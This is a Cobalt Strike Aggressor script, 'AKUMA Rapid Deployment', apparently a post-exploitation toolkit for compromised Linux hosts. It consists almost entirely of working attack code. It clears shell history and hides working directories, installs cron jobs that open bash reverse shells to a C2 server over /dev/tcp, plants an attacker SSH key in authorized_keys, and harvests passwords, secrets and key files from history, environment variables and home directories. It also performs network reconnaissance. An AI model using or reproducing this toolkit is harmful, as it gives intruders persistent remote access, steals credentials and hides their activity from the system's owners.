# AKUMA's Rapid Deployment Script - SIMPLE VERSION

%rapid_config = %(
    c2_server => "192.168.1.100",
    backup_ports => @(4444, 5555, 6666, 7777, 8888),
    ssh_key => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7vYZ...",
    scan_timeout => 30
);

popup beacon_bottom {
    menu "&AKUMA Rapid Deploy" {
        item "&Quick Foothold (2min)" {
            akuma_rapid_quick($1);
        }
        item "&Full Deploy (5min)" {
            akuma_rapid_full($1);
        }
        item "&Persistence Only" {
            akuma_rapid_persistence($1);
        }
        item "&Network Recon" {
            akuma_rapid_network($1);
        }
        item "&Credential Harvest" {
            akuma_rapid_credentials($1);
        }
        separator();
        item "&Set C2 Server IP" {
            prompt_text("C2 Server IP:", %rapid_config["c2_server"], 
                lambda({
                    %rapid_config["c2_server"] = $2;
                    show_message("C2 Server updated to: " . $2);
                }));
        }
        item "&Show Config" {
            local('$msg');
            $msg = "AKUMA Config:\n";
            $msg .= "C2 Server: " . %rapid_config["c2_server"] . "\n";
            $msg .= "Ports: " . join(", ", %rapid_config["backup_ports"]);
            show_message($msg);
        }
    }
}

sub akuma_rapid_full {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Full Deployment Starting...");
    
    akuma_deploy_stabilization($bid);
    akuma_deploy_enumeration($bid);
    akuma_deploy_persistence($bid);
    akuma_deploy_credential_harvest($bid);
    akuma_deploy_network_recon($bid);
    
    blog($bid, "AKUMA Full Deployment Complete!");
}

sub akuma_rapid_quick {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Quick Foothold Starting...");
    
    akuma_deploy_stabilization($bid);
    akuma_deploy_quick_persistence($bid);
    akuma_deploy_quick_enum($bid);
    
    blog($bid, "AKUMA Quick Foothold Complete!");
}

sub akuma_rapid_persistence {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Persistence Deployment...");
    akuma_deploy_persistence($bid);
    blog($bid, "All persistence mechanisms deployed!");
}

sub akuma_rapid_network {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Network Reconnaissance...");
    akuma_deploy_network_recon($bid);
    blog($bid, "Network reconnaissance complete!");
}

sub akuma_rapid_credentials {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Credential Harvesting...");
    akuma_deploy_credential_harvest($bid);
    blog($bid, "Credential harvesting complete!");
}

sub akuma_deploy_stabilization {
    local('$bid');
    $bid = $1;
    
    blog($bid, "Deploying stabilization measures...");
    
    bshell($bid, "export HISTFILE=/dev/null && unset HISTFILE && history -c");
    bshell($bid, "mkdir -p /tmp/.akuma 2>/dev/null && chmod 755 /tmp/.akuma");
    bshell($bid, "mkdir -p /tmp/.akuma_backup 2>/dev/null");
    bshell($bid, "cp /etc/passwd /tmp/.akuma_backup/passwd.orig 2>/dev/null");
    bshell($bid, "crontab -l > /tmp/.akuma_backup/cron.orig 2>/dev/null");
    bshell($bid, "ping -c 1 " . %rapid_config["c2_server"] . " >/dev/null 2>&1 && echo 'C2 connectivity: OK' || echo 'C2 connectivity: FAILED'");
    
    blog($bid, "Stabilization complete!");
}

sub akuma_deploy_enumeration {
    local('$bid');
    $bid = $1;
    
    blog($bid, "Deploying enumeration...");
    
    bshell($bid, "echo '=== AKUMA SYSTEM INFO ==='");
    bshell($bid, "hostname && whoami && id");
    bshell($bid, "uname -a");
    bshell($bid, "cat /etc/os-release 2>/dev/null || cat /etc/issue");
    
    bshell($bid, "echo '=== NETWORK INFO ==='");
    bshell($bid, "ip addr show 2>/dev/null | grep inet | grep -v 127.0.0.1");
    bshell($bid, "ip route 2>/dev/null | head -5");
    
    bshell($bid, "echo '=== KEY PROCESSES ==='");
    bshell($bid, "ps aux | head -10");
    
    bshell($bid, "echo '=== USERS ==='");
    bshell($bid, "cat /etc/passwd | grep bash | head -10");
    
    blog($bid, "Enumeration complete!");
}

sub akuma_deploy_persistence {
    local('$bid $server @ports');
    $bid = $1;
    $server = %rapid_config["c2_server"];
    @ports = %rapid_config["backup_ports"];
    
    blog($bid, "Deploying multiple persistence mechanisms...");
    
    bshell($bid, "echo 'Installing cron persistence...'");
    bshell($bid, "(crontab -l 2>/dev/null; echo '*/15 * * * * /bin/bash -c \"bash -i >& /dev/tcp/" . $server . "/" . @ports[0] . " 0>&1\"') | crontab -");
    bshell($bid, "(crontab -l 2>/dev/null; echo '@reboot sleep 60 && /bin/bash -c \"bash -i >& /dev/tcp/" . $server . "/" . @ports[1] . " 0>&1\"') | crontab -");
    
    local('$ssh_key');
    $ssh_key = %rapid_config["ssh_key"];
    bshell($bid, "echo 'Installing SSH key...'");
    bshell($bid, "mkdir -p ~/.ssh 2>/dev/null");
    bshell($bid, "echo '" . $ssh_key . "' >> ~/.ssh/authorized_keys 2>/dev/null");
    bshell($bid, "chmod 600 ~/.ssh/authorized_keys 2>/dev/null");
    
    bshell($bid, "echo 'export HISTFILE=/dev/null' >> ~/.bashrc");
    
    blog($bid, "Multiple persistence mechanisms deployed!");
}

sub akuma_deploy_quick_persistence {
    local('$bid $server $port1');
    $bid = $1;
    $server = %rapid_config["c2_server"];
    $port1 = %rapid_config["backup_ports"][0];
    
    blog($bid, "Deploying quick persistence...");
    
    bshell($bid, "(crontab -l 2>/dev/null; echo '*/10 * * * * /bin/bash -c \"bash -i >& /dev/tcp/" . $server . "/" . $port1 . " 0>&1\"') | crontab -");
    bshell($bid, "mkdir -p ~/.ssh 2>/dev/null && echo '" . %rapid_config["ssh_key"] . "' >> ~/.ssh/authorized_keys 2>/dev/null");
    
    blog($bid, "Quick persistence deployed!");
}

sub akuma_deploy_quick_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "Quick enumeration...");
    
    bshell($bid, "echo '=== QUICK SYSTEM CHECK ==='");
    bshell($bid, "whoami && hostname && uname -r");
    bshell($bid, "ps aux | head -5");
    bshell($bid, "ss -tlnp 2>/dev/null | head -5");
    
    blog($bid, "Quick enumeration complete!");
}

sub akuma_deploy_credential_harvest {
    local('$bid');
    $bid = $1;
    
    blog($bid, "Deploying credential harvesting...");
    
    bshell($bid, "echo '=== AKUMA CREDENTIAL HARVEST ==='");
    bshell($bid, "echo '=== COMMAND HISTORY SECRETS ==='");
    bshell($bid, "cat ~/.bash_history 2>/dev/null | grep -i pass | tail -20");
    bshell($bid, "cat ~/.bash_history 2>/dev/null | grep -i secret | tail -20");
    bshell($bid, "cat ~/.bash_history 2>/dev/null | grep -i key | tail -20");
    
    bshell($bid, "echo '=== SSH KEYS ==='");
    bshell($bid, "find /home -name 'id_*' 2>/dev/null | head -10");
    bshell($bid, "find /home -name '*.pem' 2>/dev/null | head -10");
    
    bshell($bid, "echo '=== CONFIG FILES ==='");
    bshell($bid, "find /home -name '*.conf' 2>/dev/null | head -10");
    
    bshell($bid, "echo '=== ENVIRONMENT SECRETS ==='");
    bshell($bid, "env | grep -i pass 2>/dev/null");
    bshell($bid, "env | grep -i secret 2>/dev/null");
    bshell($bid, "env | grep -i key 2>/dev/null");
    
    blog($bid, "Credential harvest complete!");
}

sub akuma_deploy_network_recon {
    local('$bid');
    $bid = $1;
    
    blog($bid, "Deploying network reconnaissance...");
    
    bshell($bid, "echo '=== NETWORK DISCOVERY ==='");
    bshell($bid, "ip route 2>/dev/null | head -5");
    bshell($bid, "arp -a 2>/dev/null | head -10");
    
    bshell($bid, "echo '=== PING SWEEP ==='");
    bshell($bid, "ping -c 1 192.168.1.1 >/dev/null 2>&1 && echo '192.168.1.1 alive'");
    bshell($bid, "ping -c 1 192.168.1.10 >/dev/null 2>&1 && echo '192.168.1.10 alive'");
    bshell($bid, "ping -c 1 192.168.1.100 >/dev/null 2>&1 && echo '192.168.1.100 alive'");
    bshell($bid, "ping -c 1 10.0.0.1 >/dev/null 2>&1 && echo '10.0.0.1 alive'");
    bshell($bid, "ping -c 1 10.0.0.10 >/dev/null 2>&1 && echo '10.0.0.10 alive'");
    
    bshell($bid, "echo '=== LOCAL SERVICES ==='");
    bshell($bid, "ss -tlnp 2>/dev/null | grep LISTEN | head -15");
    
    blog($bid, "Network reconnaissance complete!");
}

blog("AKUMA Rapid Deployment Script Loaded!");
